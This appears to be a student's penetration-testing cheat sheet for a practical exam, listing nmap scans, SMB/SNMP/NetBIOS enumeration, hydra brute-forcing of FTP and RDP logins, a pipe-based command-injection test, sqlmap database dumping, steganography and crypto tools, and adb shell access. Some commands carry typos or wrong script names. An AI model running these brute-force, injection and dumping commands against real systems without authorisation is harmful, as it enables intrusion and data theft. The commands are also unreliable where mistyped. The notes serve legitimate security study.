

SCANNING NETWORK USING NMAP

Scanning network Live Host (ping sweep)	nmap -sP IP/CIDR
Scanning Live Host without port scan (ARP)	nmap -PR -sn IP/CIDR
Scripts+Version running on target	nmap -sC -sV IP/CIDR
OS of the target	nmap -O IP
All open ports of the target	nmap -p- IP/CIDR
Specific port scan of the target	nmap -p <port-number> IP/CIDR
Aggressive scan	nmap -A IP/CIDR
Scanning using NSE scripts	nmap --scripts <script_name> -p <port> IP/CIDR
Scripts+Version+Ports+OS scan	nmap -sC -sV -p- -A -v -T4 IP/CIDR

SERVICE ENUMERATION

FTP>SNMP>SMB>RDP>NetBIOS

FTP

```
nmap -sC -p 21 <ip>
hydra -L /usr/share/wordlists/metasploit/ -P <ip> ftp
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <ip> ftp
ftp <ip>
get file.txt (to download it)
ls
cat file.txt
```

SNMP

```
nmap -sP <ip>
snmp-check <ip>
nmap -sU -p 161 --script=snmp-processes <target>
msfconsole
search snmp
```

snmp processes
<https://nmap.org/nsedoc/scripts/>
Find valid strings using metasploit

use auxiliary/scanner/snmp/snmp_login

show options

ip a

set RHOSTS <ip>

show options

exploit

exit

nmap -sU -p 161 --script=snmp.interfaces <target>

<https://nmap.org/nsedoc/scripts/snmp.interfaces.html>

snmp-check <ip>

SMB

nmap -p 445 --script smb.enum.shares <ip>

Shares details with permissions

File manager>Network>Windows Network>

Connect SMB GUI

On the bar (smb://<ip>)

<https://youtu.be/T55Z0spbweY?t=1656>

nmap -p 445 --script smb.enum.users <ip>

Enumerating users

nmap -p 445 --script smb.enum.users --script-args smb.username=<user>, smb.password=<pass> <ip>

nmap -p 445 --script smb.enum.groups --script-args smb.username=<user>, smb.password=<pass> <ip>

Enumerating groups

nmap -sC -sV -A -T4 -p 445 <ip>

Enumerating security level

nmap -p 445 --script smb.enum.services --script-args smb.username=<user>, smb.password=<pass> <ip>

Enumerating services

RDP

nmap <ip>

Find port with RDP

msfconsole -q

Confirm port

search rdp

use auxiliary/scanner/rdp/rdp_scanner

show options

set RHOSTS <ip>

set RPORT <port> (3333?)

exploit

exit

hydra -L /usr/share/metasploit-framework/data/wordlists/

Brute force RDP

hydra -L /usr/share/metasploit-framework/data/wordlists/commom_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://<ip>

xfreerdp /u:<user> /p:<passwd> /v:<ip>:<port>

Xfreerdp to create RDP session

NetBIOS

ip a

nmap -sP <ip+*>

Enum network (last octet wildcard)

nmap -sV --script nbstat.nse <found ip>

Enum ip

Enum netbios

WIRESHARK (traffic sniffing)

tcp.flags.syn==1

<https://youtu.be/2lchMa5VKnw?t=316>

Filtering packets (DoS attack)

left click frame>Follow>HTTP Stream

Follow Streams TCP/HTTP

left click frame>Follow>TCP Stream

Red part SENT blue RESPONSE from server

Stream button on right bottom 1,2..

Walkthrough stream numbers

Flag cypher for text

decipher algorithms (not required in the exam, **just the FLAG**)

File>Export Objects>HTTP>filter by Content Type>text/plain>Save

Find files

Select frame>left bottom icon near request number

Find comments

CTRL+F

Finding Strings

Could have a flag

DOS/DDOS

Statistics>Conversations

Select IPV4>Select Bytes

The ip with the most requests are the ones attacking

Could be IPV6 too

STEGANOGRAPHY

SNOW (hiding and extracting hidden data from txt file)

OPENSTEGO (hiding and extracting hidden data from image file)

COVERT TCP (hiding data TCP/IP packet headers)

SNOW

Open in terminal (or powershell)

https://youtu.be/aNHW1A_rpNs?t=218

dir

SNOW.EXE -C -m "secret_msg" -p "<passwd>" <name file in dir> <name output file>

Hiding data

SNOW.EXE -C -p "<passwd>" <name output file>

Extract data

Openstego

Hide data>message file (browse&select txt file to hide)

Hiding text into image

Cover file (browse the image to hide the txt inside)

Name output file

https://youtu.be/aNHW1A_rpNs?t=512

Hide data button

Extract data (browse image)

Extract

Output select open

Password if needed

Extract data

if hash> hashes.com

Covert TCP

cc -o covert_tcp covert_tcp.c

https://youtu.be/aNHW1A_rpNs?t=845

./cover_tcp -dest <Dest-IP> -source <Source-IP> -source_port 9999 -dest_port 8888 -server -file /path/to/file.txt

For receiving/listening (need to be root)

./cover_tcp -dest <Dest-IP> -source <Source-IP> -source_port 8888 -dest_port 9999 -server -file /path/to/file.txt

For sending (need to be root)

CRYPTOGRAPHY

Hashmyfiles (calculating and comparing hashes of files)

CryptoForge (encrypting/decrypting the files)

Cryptool (encryption/decryption of hex data manipulating key length)

VeraCrypt (hiding and encrypting disk partitions)

BcTextEncoder (encoding/decoding txt in file (.hex))

HashMyFiles

Drag files into hashmyfiles

check if tampered by comparing hashes

<https://youtu.be/DtWjUsbuMtk?t=219>

CryptoForge

Left click file, option "Encrypt"

encrypt

Window with passphrase

<https://youtu.be/DtWjUsbuMtk?t=374>

Click on the file, passphrase to decrypt it

decrypt hash on hashes.com

BcTextEncoder

Write text on Decoded plain>Encode>passwd

Encode

Write text on Encoded text>Decode>passwd

Decode and hashes.com

<https://youtu.be/DtWjUsbuMtk?t=495>

Cryptool

File options>open>select file

hex format of the file

Analysis>select symmetric Encryption>Keylength>start

find flag or hashes.com

<https://youtu.be/DtWjUsbuMtk?t=632>

VeraCrypt

Create volume>create encrypted file container>hidden veracrypt volume>

<https://youtu.be/DtWjUsbuMtk?t=789>

select file>select algorithm>select space>passwd outer partition>

scroll mouse>format>next hidden volume>select space (smaller than outer)>

>passwd>next>format>ok>next>cancel window

mount partition>select device>passwd related to the partition

WEB

SQLMap (finding SQL injection vulnerabilities)

Wpscan (scanning and finding issues wordpress websites)

Burpsuite (analysing and manipulating the traffic)

ADB (connecting android devices to pc and binary analysis)

SQLMap

ping -c 3 <ip>

command execution

ping -c 3 <ip> | pwd

id=	Find SQLi
	Intercept with burp
Intercept with burp, save item (req.txt)	
cd dir saved file	
sqlmap -r <req.txt> --dbs	
sqlmap -r <req.txt> -D <dbs>	
sqlmap -r <req.txt> -D <dbs> --tables	
sqlmap -r <req.txt> -D <dbs> --tables --columns	
sqlmap -r <req.txt> -D <dbs> --dump	

WpScan

ping <ip>	
wpscan --url <url> --enumerate u	wpscan -h info

ADB

adb connect <ip>:<port>	adb devices?
adb shell	
ls, whoami	
cd sdcard/	find secret.txt
cat secret.txt	